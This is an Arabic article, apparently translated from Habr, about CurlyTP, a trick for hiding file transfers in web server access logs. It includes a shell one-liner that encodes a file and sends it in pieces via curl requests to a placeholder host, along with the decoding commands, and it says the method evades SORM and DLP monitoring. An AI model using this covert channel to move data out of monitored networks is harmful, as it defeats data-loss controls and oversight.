وفقًا لتعريف ويكيبيديا، فإن القطرة الميتة هي أداة مؤامرة تعمل على تبادل المعلومات أو بعض العناصر بين الأشخاص الذين يستخدمون موقعًا سريًا. والفكرة هي أن الناس لا يجتمعون أبدًا، لكنهم ما زالوا يتبادلون المعلومات للحفاظ على السلامة التشغيلية.

يجب ألا يجذب مكان الاختباء الانتباه. لذلك، في العالم غير المتصل بالإنترنت، غالبًا ما يستخدمون أشياء سرية: لبنة فضفاضة في الحائط، أو كتاب مكتبة، أو جوفاء في شجرة.

هناك العديد من أدوات التشفير وإخفاء الهوية على الإنترنت، ولكن حقيقة استخدام هذه الأدوات تجذب الانتباه. بالإضافة إلى ذلك، قد يتم حظرهم على مستوى الشركة أو الحكومة. ما يجب القيام به؟

اقترح المطور Ryan Flowers خيارًا مثيرًا للاهتمام - استخدم أي خادم ويب كمكان للاختباء. إذا فكرت في الأمر، ماذا يفعل خادم الويب؟ يتلقى الطلبات ويصدر الملفات ويكتب السجلات. ويسجل جميع الطلبات حتى تلك غير الصحيحة!

اتضح أن أي خادم ويب يسمح لك بحفظ أي رسالة تقريبًا في السجل. تساءلت الزهور عن كيفية استخدام هذا.

ويقدم هذا الخيار:

1. خذ ملفًا نصيًا (رسالة سرية) واحسب التجزئة (md5sum).
2. نقوم بتشفيره (gzip+uuencode).
3. نكتب إلى السجل باستخدام طلب غير صحيح عن عمد إلى الخادم.

Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt

[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh

لقراءة ملف، تحتاج إلى تنفيذ هذه العمليات بترتيب عكسي: فك تشفير الملف وفك ضغطه، والتحقق من التجزئة (يمكن نقل التجزئة بأمان عبر القنوات المفتوحة).

يتم استبدال المساحات ب =+=بحيث لا توجد مسافات في العنوان. يستخدم البرنامج، الذي يسميه المؤلف CurlyTP، ترميز base64، مثل مرفقات البريد الإلكتروني. يتم الطلب باستخدام كلمة رئيسية ?transfer?حتى يتمكن المستلم من العثور عليه بسهولة في السجلات.

ماذا نرى في السجلات في هذه الحالة؟

1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"

كما ذكرنا سابقًا، لتلقي رسالة سرية، عليك إجراء العمليات بترتيب عكسي:

Remote machine

[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue

[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 g

العملية سهلة للأتمتة. يتطابق Md5sum، وتؤكد محتويات الملف أنه تم فك تشفير كل شيء بشكل صحيح.

الطريقه بسيطه جدا. "الهدف من هذا التمرين هو إثبات أنه يمكن نقل الملفات من خلال طلبات ويب صغيرة بريئة، وأنها تعمل على أي خادم ويب يحتوي على سجلات نصية عادية. في الأساس، كل خادم ويب هو مكان للاختباء!"، يكتب فلاورز.

بالطبع، لا تعمل الطريقة إلا إذا كان لدى المستلم حق الوصول إلى سجلات الخادم. ولكن يتم توفير هذا الوصول، على سبيل المثال، من قبل العديد من المضيفين.

كيفية استخدامها؟

يقول رايان فلاورز إنه ليس خبيرًا في أمن المعلومات ولن يقوم بتجميع قائمة بالاستخدامات المحتملة لـ CurlyTP. بالنسبة له، هذا مجرد دليل على أن الأدوات المألوفة التي نراها كل يوم يمكن استخدامها بطريقة غير تقليدية.

في الواقع، تتمتع هذه الطريقة بعدد من المزايا مقارنة بمثيلاتها من الخوادم الأخرى القطرة الميتة الرقمية أو PirateBox: لا يتطلب تكوينًا خاصًا من جانب الخادم أو أي بروتوكولات خاصة - ولن يثير الشكوك بين أولئك الذين يراقبون حركة المرور. من غير المحتمل أن يقوم نظام SORM أو DLP بفحص عناوين URL بحثًا عن الملفات النصية المضغوطة.

هذه إحدى طرق نقل الرسائل عبر ملفات الخدمة. يمكنك أن تتذكر كيف كانت بعض الشركات المتقدمة تضعها وظائف المطورين في رؤوس HTTP أو في كود صفحات HTML.

كانت الفكرة هي أن مطوري الويب فقط هم من سيشاهدون بيضة عيد الفصح هذه، نظرًا لأن الشخص العادي لن ينظر إلى الرؤوس أو كود HTML.

المصدر: www.habr.com